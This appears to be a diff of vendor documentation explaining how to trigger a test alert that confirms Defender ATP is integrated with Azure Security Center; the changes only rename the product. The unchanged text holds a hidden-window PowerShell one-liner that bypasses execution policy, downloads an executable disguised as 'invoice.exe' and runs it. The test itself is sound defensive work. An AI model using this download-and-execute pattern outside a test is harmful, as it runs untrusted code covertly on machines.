 Use Remote Desktop to access either a Windows Server 2012 R2 VM or a Windows Server 2016 VM.
 Open a Command Prompt window.

 At the prompt, copy and run the following command.
 The Command Prompt window will close automatically.

 powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe'); Start-Process 'C:\\test-WDATP-test\\invoice.exe'

-If the command is successful, you'll see a new alert on the Azure Security Center dashboard and the Windows Defender ATP portal.
+If the command is successful, you'll see a new alert on the Azure Security Center dashboard and the Microsoft Defender ATP portal.
 This alert might take a few minutes to appear.

 To review the alert in Security Center, go to Security Alerts > Suspicious Powershell CommandLine.

-From the investigation window, select the link to go to the Windows Defender ATP portal.
+From the investigation window, select the link to go to the Microsoft Defender ATP portal.

 - Setting security policies in Azure Security Center: Learn how to configure security policies for your Azure subscriptions and resource groups.